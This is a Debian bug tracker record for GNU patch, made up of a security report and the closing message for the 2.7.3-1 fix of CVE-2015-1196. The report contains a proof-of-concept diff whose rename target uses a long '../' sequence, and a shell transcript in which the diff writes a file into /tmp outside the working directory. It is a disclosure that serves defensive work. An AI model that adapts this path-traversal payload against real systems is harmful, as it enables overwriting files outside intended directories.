Bug#775873: marked as done (patch: directory traversal via file rename)

Sat, 24 Jan 2015 09:22:03 -0800 

Your message dated Sat, 24 Jan 2015 17:18:23 +0000
with message-id <e1yf4ln-00031n...@franck.debian.org>
and subject line Bug#775873: fixed in patch 2.7.3-1
has caused the Debian Bug report #775873,
regarding patch: directory traversal via file rename
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
775873: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=775873
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Package: patch
Version: 2.7.1-7
Tags: security
patch now support git-style patches, which allows renaming files. This feature can be abused for directory traversal. As a proof of concept, applying the attached patch creates a file in /tmp: 

$ ls /tmp/moo
/bin/ls: cannot access /tmp/moo: No such file or directory

$ mkdir empty && cd empty

$ patch -p1 < ~/traversal2.diff
patching file moo
patching file 
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
 (renamed from moo)

$ ls /tmp/moo
/tmp/moo


-- System Information:
Debian Release: 8.0
 APT prefers unstable
 APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64

Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages patch depends on:
ii  libc6  2.19-13

--
Jakub Wilk

diff --git a/moo b/moo
new file mode 100644
--- /dev/null
+++ b/tmp/moo
@@ -0,0 +1 @@
+moo
diff --git a/moo a/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
rename from x
rename to x

--- End Message ---
--- Begin Message --- 
Source: patch
Source-Version: 2.7.3-1

We believe that the bug you reported is fixed in the latest version of
patch, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 775...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <g...@debian.org> (supplier of updated patch package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Fri, 23 Jan 2015 20:27:32 +0000
Source: patch
Binary: patch
Architecture: source amd64
Version: 2.7.3-1
Distribution: unstable
Urgency: high
Maintainer: Laszlo Boszormenyi (GCS) <g...@debian.org>
Changed-By: Laszlo Boszormenyi (GCS) <g...@debian.org>
Description:
 patch      - Apply a diff file to an original
Closes: 775873 775901
Changes:
 patch (2.7.3-1) unstable; urgency=high
 .
   * New upstream release with security fixes:
     - fix all cases of CVE-2015-1196 (closes: #775873, #775901),
     - fix infinite loop while applying patch, CVE-2014-9637.
   * Remove outdated disable-update-version and add_manpage_time.patch
     Debian patches.
   * Add homepage field.
   * Add watch file.
Checksums-Sha1:
 4f268078a1fbca817718bdbdc55800dc248010c2 1795 patch_2.7.3-1.dsc
 4191a36e4733935912280650b32644d9c786dfa1 684764 patch_2.7.3.orig.tar.xz
 f55e05a44ce413bad4ec4024b1535642a32bb49e 8008 patch_2.7.3-1.debian.tar.xz
 ea9a4bac964c7597778c622a8180ead0dd14c8a3 100886 patch_2.7.3-1_amd64.deb
Checksums-Sha256:
 1995faba243dd94983feaed23d5426cbdafdeea062716d6e16d3f2293c8cecb3 1795 
patch_2.7.3-1.dsc
 d09022de9d629561bf4dad44625ef4b1ead15178b210412113531730cdb6f19d 684764 
patch_2.7.3.orig.tar.xz
 ec7b8b549a0ae8a00edd4655715100e22d85c3f3babc7c83ee0008cc23093632 8008 
patch_2.7.3-1.debian.tar.xz
 3af466c57953e6a653d703e3f665d8e02f2a4ef862c70f8cac2033aed4dc7096 100886 
patch_2.7.3-1_amd64.deb
Files:
 4911f5407afb72e201faa3ec9a8191f8 1795 vcs standard patch_2.7.3-1.dsc
 29b87be845e4662ab0ca0d48a805ecc6 684764 vcs standard patch_2.7.3.orig.tar.xz
 ce27aa99309c2c801fd6f9bcc951aa2c 8008 vcs standard patch_2.7.3-1.debian.tar.xz
 c6ce0a0e9a7793382f674a640cac50e7 100886 vcs standard patch_2.7.3-1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJUw8gPAAoJENzjEOeGTMi/zlMQAI4/qvk+rLMAlScuQLzerLL7
RGDqAH3I0bVuucHkHhVKIsHGm2AeME4NdE+HZnThrgEL94Opz3fKY8j3arPWgFkR
GQJP4jEo76LLLFfwzB5TVefqN/BviRiG4dYzCTMC5p+ojs75z7z9UX3V3+Ki2Gcr
NxXZ//i4NzaLFGXA8+djvQ2iWBgjx95K00ujxTmCyYVbdRbsQ3t5vFsuETavkzNW
DZw8qJ3rQWhye602Z5jF0Q12YEnbLLY80iOPG26i0zXU0+lNTTw6APuQAsSn+BvN
dlfzl2j9xXdOjTza9LvBhsLGNtSvQev+R8ORGYEmPINwGq/2vF2TucGWmYllS/Wl
0LOgyfXtFm9k5+dZ9jUJM9TUeQRTn6er/7aECu62CjoXIQNspV/1XP66RsH4m4Z4
f0/Z6JL+yGFHJkB8NK7mKZVLW36L8x8vhhmbx+fIE5/NSH/DWfTuUrR22VKIY3B5
o46UUYvde/dxwVK2auIs4KPIUn/YK090NU2TnVv/M2uJgGbbs3phDwCqJukJC1s9
QCeCsQ77Ctn6IHN0a7D1CbQrmYovqdEeDvNYZE7bp1Ty+JxzPl99dpbuTr1kBbYX
p/dmg4V43q2o5FZYSb7j6RnalgA14JuzUaSS/URjphJFiWLDbuba3mXmOxXJ3oHg
tEKZF2rKwjYrdkBBUDxG
=kUjt
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to